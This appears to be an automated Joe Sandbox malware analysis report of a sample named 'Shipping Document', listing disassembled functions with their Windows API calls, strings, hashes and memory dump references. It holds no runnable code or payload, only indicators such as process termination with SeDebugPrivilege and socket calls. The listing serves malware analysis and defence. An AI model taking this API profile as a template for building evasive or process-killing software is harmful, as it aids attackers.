Instruction ID: d25ba754b7db1e1c069e249ac728c3b2dd0363fddfa30633de5e5ed087854a23
Opcode Fuzzy Hash: 92df2292e70286867dd3ce00cbd5be44c9615afb89828029f29bc502ecb14473
Instruction Fuzzy Hash: 1501BBB9240309BFE720ABA9DD8DF6B3BACEB89711F004411FA45DB195CA759800CB60

Function 01039428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0103947C
VariantInit.OLEAUT32(?), ref: 0103954D
VariantInit.OLEAUT32(?), ref: 0103964E
VariantClear.OLEAUT32(?), ref: 01039658
VariantClear.OLEAUT32(?), ref: 010396B5

Strings

Incorrect Object type in FOR..IN loop, xrefs: 01039631
Null Object assignment in FOR..IN loop, xrefs: 010394DD, 0103960B, 010396C3

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: eac271284911080ea0cb17c512566f430fd2fc7106ca52e2506b9b8f736cb622
Instruction ID: 69037e3eadfd935f42c50054321875e6e3970365d691e873a8d7cd9525d09417
Opcode Fuzzy Hash: eac271284911080ea0cb17c512566f430fd2fc7106ca52e2506b9b8f736cb622
Instruction Fuzzy Hash: A191B371A00205EBDF25DFA5C844FAEBBBCEF89318F008559F555AB281D7B09944CFA0

Function 01039A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 01017652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?,?,?,0101799D), ref: 0101766F
Part of subcall function 01017652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?,?), ref: 0101768A
Part of subcall function 01017652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?,?), ref: 01017698
Part of subcall function 01017652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?), ref: 010176A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 01039B1B
_memset.LIBCMT ref: 01039B28
_memset.LIBCMT ref: 01039C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 01039C97
CoTaskMemFree.OLE32(?), ref: 01039CA2

Strings

NULL Pointer assignment, xrefs: 01039CF0

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: c27e5b83e6563094b2bf5372450a1b6bf3c82c3bdad5171df144c96732a6f441
Instruction ID: ff7e6ef17cea125826480bd4366a456dd30b08dba23c9d6dd5cd8d2a490e043c
Opcode Fuzzy Hash: c27e5b83e6563094b2bf5372450a1b6bf3c82c3bdad5171df144c96732a6f441
Instruction Fuzzy Hash: 02917771D0022DEBDB10DFA5DC85EDEBBB8AF48710F20415AE509A7240DB75AA40CFA0

Function 01046FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01047093
SendMessageW.USER32(?,00001036,00000000,?), ref: 010470A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 010470C1
_wcscat.LIBCMT ref: 0104711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 01047133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 01047161

Strings

SysListView32, xrefs: 01047065

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 5928bb40eaa78b3f2928363675f002a56495a4fa0b18bbe092fbc470451edcae
Instruction ID: 97773ecc20b5ece0a198e24eade10d82465562a9c94f1dd27027b5e90543fb0c
Opcode Fuzzy Hash: 5928bb40eaa78b3f2928363675f002a56495a4fa0b18bbe092fbc470451edcae
Instruction Fuzzy Hash: 4F4191B5A00309EFEB219F68CC85BEE77E9EF08350F10057AF6C5A7192D77699848B50

Function 0103EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 01023E91: CreateToolhelp32Snapshot.KERNEL32 ref: 01023EB6
Part of subcall function 01023E91: Process32FirstW.KERNEL32(00000000,?), ref: 01023EC4
Part of subcall function 01023E91: CloseHandle.KERNEL32(00000000), ref: 01023F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0103ECB8
GetLastError.KERNEL32 ref: 0103ECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0103ECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 0103ED77
GetLastError.KERNEL32(00000000), ref: 0103ED82
CloseHandle.KERNEL32(00000000), ref: 0103EDB7

Strings

SeDebugPrivilege, xrefs: 0103ECD6

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 0a74a5ffc57d2d1c7d438bf631d7f834ff3cedea53f8c04def328bb32dc135b0
Instruction ID: f8e6c773f96f6432fdfdc11c89ad086bc1fefd6adf51ecbc775f02ea05d8c4a2
Opcode Fuzzy Hash: 0a74a5ffc57d2d1c7d438bf631d7f834ff3cedea53f8c04def328bb32dc135b0
Instruction Fuzzy Hash: 3C41B5712042029FDB15EF18CC99F6DB7E5AF80714F08815DF9869F2C2DBB9A804CB55

Function 01023226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 010232C5

Strings

info, xrefs: 01023266
warning, xrefs: 010232AE
question, xrefs: 0102327E
stop, xrefs: 01023296
blank, xrefs: 01023247

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 5751796727ee0d8cf9d4b51d8a6f573ed26bf7dfea98f2dc554ccdd250badb50
Instruction ID: e2d06c561c53e696028a50002ce59ad2cd41c8ca4f0c102297e9b1d397cf8221
Opcode Fuzzy Hash: 5751796727ee0d8cf9d4b51d8a6f573ed26bf7dfea98f2dc554ccdd250badb50
Instruction Fuzzy Hash: 84112B31B083A6BBE7015A59DC47D6EB7DCFF0E670F10005EF580AF182D67D664486A4

Function 01024534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0102454E
LoadStringW.USER32(00000000), ref: 01024555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0102456B
LoadStringW.USER32(00000000), ref: 01024572
_wprintf.LIBCMT ref: 01024598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 010245B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 01024593

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 177894805b5efdba201835129e31388b7c0c1d4344db515e465bc3c83029fd69
Instruction ID: 7d7c6515c14c0847aadca8456184883a92551be2265460db750c46286569b514
Opcode Fuzzy Hash: 177894805b5efdba201835129e31388b7c0c1d4344db515e465bc3c83029fd69
Instruction Fuzzy Hash: A201DBF68002197FE720D7A4DEC9EF7776CD708300F000595BB85D2002EA355E854B70

Function 0104D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623

GetSystemMetrics.USER32(0000000F), ref: 0104D78A
GetSystemMetrics.USER32(0000000F), ref: 0104D7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0104D9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0104DA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0104DA24
ShowWindow.USER32(00000003,00000000), ref: 0104DA43
InvalidateRect.USER32(?,00000000,00000001), ref: 0104DA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 0104DA8B

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 05c8309a071f82fbc7528e8cd1269571fedb6a99f5bfe39163d3d40bec074dae
Instruction ID: 1c4636f6d3579b25d4951044c690f729c5adc882b5f5f8e257d4ac906bd424dc
Opcode Fuzzy Hash: 05c8309a071f82fbc7528e8cd1269571fedb6a99f5bfe39163d3d40bec074dae
Instruction Fuzzy Hash: 28B177B5600216EBEF14CFACC5C57AD7BF2BF54701F0881B9ED889A289D735A950CB90

Function 00FC2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FFC417,00000004,00000000,00000000,00000000), ref: 00FC2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FFC417,00000004,00000000,00000000,00000000,000000FF), ref: 00FC2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FFC417,00000004,00000000,00000000,00000000), ref: 00FFC46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FFC417,00000004,00000000,00000000,00000000), ref: 00FFC4D6

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 5a2dd4fab95832eeb50be8e319e1b5676194bd7249e2564786217132205fac7a
Instruction ID: ee5f35f63e7ff7394cef47efeb5f9dca98081d61150fbd2039d4f519dd859a14
Opcode Fuzzy Hash: 5a2dd4fab95832eeb50be8e319e1b5676194bd7249e2564786217132205fac7a
Instruction Fuzzy Hash: DB412A71A086869BC7B9DB2C9FDAF7A3B91FF85320F14880DE18786560C67E9841F750

Function 01027368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0102737F

Part of subcall function 00FE0FF6: std::exception::exception.LIBCMT ref: 00FE102C
Part of subcall function 00FE0FF6: __CxxThrowException@8.LIBCMT ref: 00FE1041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 010273B6
EnterCriticalSection.KERNEL32(?), ref: 010273D2
_memmove.LIBCMT ref: 01027420
_memmove.LIBCMT ref: 0102743D
LeaveCriticalSection.KERNEL32(?), ref: 0102744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 01027461
InterlockedExchange.KERNEL32(?,000001F6), ref: 01027480

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: f921beb9b0ba86c51f406527fa843801895213b5ac6efd713c77700f18574965
Instruction ID: 17a6824fd9f5b5732af7430cce0b532db692985644449915c2d70d51826788f3
Opcode Fuzzy Hash: f921beb9b0ba86c51f406527fa843801895213b5ac6efd713c77700f18574965
Instruction Fuzzy Hash: 9131CF75900246EBDF10EF69CD85AAFBBB8FF45310B1440A5F944AB24ADB35DA10DBA0

Function 01046442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0104645A
GetDC.USER32(00000000), ref: 01046462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0104646D
ReleaseDC.USER32(00000000,00000000), ref: 01046479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 010464B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 010464C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,01049299,?,?,000000FF,00000000,?,000000FF,?), ref: 01046500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01046520

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 8d62ac627dd1fa7b7ffc25e4532b813661e5ec872c4ec3298c8dc810c3212542
Instruction ID: 372aaa1822fa72986138b2f922b0545e122344ebd0aff47eeb1abaa2aa6853c2
Opcode Fuzzy Hash: 8d62ac627dd1fa7b7ffc25e4532b813661e5ec872c4ec3298c8dc810c3212542
Instruction Fuzzy Hash: EF3193B52011107FEB218F54CD85FE73FA9EF4A751F0400A5FE489A195D67A9841CBA0

Function 0101C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0101C087
_memcmp.LIBCMT ref: 0101C0A9
_memcmp.LIBCMT ref: 0101C0C1
_memcmp.LIBCMT ref: 0101C0D4
_memcmp.LIBCMT ref: 0101C0EE
_memcmp.LIBCMT ref: 0101C101
_memcmp.LIBCMT ref: 0101C119
_memcmp.LIBCMT ref: 0101C134

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 32ac2192bb84eca07adb2db7adb0eea1f54c5874a06b98be7b4f41493bfa9e35
Instruction ID: ae5926950b5102db7bbe2158dd79f481bd64d92381729193cb472fc50f2e4577
Opcode Fuzzy Hash: 32ac2192bb84eca07adb2db7adb0eea1f54c5874a06b98be7b4f41493bfa9e35
Instruction Fuzzy Hash: 0821D7727C1209B7F392A5278E42FAF379CAF12294B040024FE899A247E769DD11C1A6

Function 0102ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C

Part of subcall function 00FDFEC6: _wcscpy.LIBCMT ref: 00FDFEE9

_wcstok.LIBCMT ref: 0102EEFF
_wcscpy.LIBCMT ref: 0102EF8E
_memset.LIBCMT ref: 0102EFC1

Strings

X, xrefs: 0102EFFE

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 3de81efbb5a373a3a7ea8062b58b96d69c6c30c066dd1c2d17a9255e9a1cdcd8
Instruction ID: b065cd47464cb3e81e7cf0eb153cdb373ad26012739e96cbc1d3989aa1291abe
Opcode Fuzzy Hash: 3de81efbb5a373a3a7ea8062b58b96d69c6c30c066dd1c2d17a9255e9a1cdcd8
Instruction Fuzzy Hash: 7EC1AF315083529FD764EF24C986E5AB7E4BF84310F00496DF9D98B2A2DB74ED44DB82

Function 01036E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?), ref: 01036F14
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01036F35
WSAGetLastError.WSOCK32(00000000), ref: 01036F48
htons.WSOCK32(?), ref: 01036FFE
inet_ntoa.WSOCK32(?), ref: 01036FBB

Part of subcall function 0101AE14: _strlen.LIBCMT ref: 0101AE1E
Part of subcall function 0101AE14: _memmove.LIBCMT ref: 0101AE40

_strlen.LIBCMT ref: 01037058
_memmove.LIBCMT ref: 010370C1

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 7a41d25e8439ba20d7b96dfbf09a29dd88b907631f42d1bc1f1a4291a94ddf10
Instruction ID: 63e12e0c3018af97015c461e8eb09dd2c0219f9707d05406f41f616d10ea6587
Opcode Fuzzy Hash: 7a41d25e8439ba20d7b96dfbf09a29dd88b907631f42d1bc1f1a4291a94ddf10
Instruction Fuzzy Hash: 0481DF75104302ABD710EB28CD86F6FB7E9AFC4714F00491CF5959B292DA79AE05CBA1

Function 00FC1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e96ef96a2fd6f095c114c915078d4fec04398671391c34c170067b1c81a356f9
Instruction ID: 1d4338822af0a1421a8c9146f986375a8c977f2c3b473357a22e4fee73991aaf
Opcode Fuzzy Hash: e96ef96a2fd6f095c114c915078d4fec04398671391c34c170067b1c81a356f9
Instruction Fuzzy Hash: C071807590010AEFCB14CF58CD85FBEBB79FF86324F248149F915AA252C734AA61DB60

Function 0104B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(011D5DD8), ref: 0104B6A5
IsWindowEnabled.USER32(011D5DD8), ref: 0104B6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0104B795
SendMessageW.USER32(011D5DD8,000000B0,?,?), ref: 0104B7CC
IsDlgButtonChecked.USER32(?,?), ref: 0104B809
GetWindowLongW.USER32(011D5DD8,000000EC), ref: 0104B82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0104B843

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 9de30d596e4d651011b488a885b69921cdc5de79c36d1429a2bf4a6749e859e4
Instruction ID: f2360f9b56d9a7d0c728e712d141e39bdfab7c9a59dc80f05dbe7df087ea3fa6
Opcode Fuzzy Hash: 9de30d596e4d651011b488a885b69921cdc5de79c36d1429a2bf4a6749e859e4
Instruction Fuzzy Hash: 7C719EB4604205AFEB65EF68C8D4FAA7BF9FF09340F0840A9EAC597251C736E941CB50

Function 0103F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0103F75C
_memset.LIBCMT ref: 0103F825
ShellExecuteExW.SHELL32(?), ref: 0103F86A

Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C

Part of subcall function 00FDFEC6: _wcscpy.LIBCMT ref: 00FDFEE9

GetProcessId.KERNEL32(00000000), ref: 0103F8E1
CloseHandle.KERNEL32(00000000), ref: 0103F910

Strings

@, xrefs: 0103F839

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
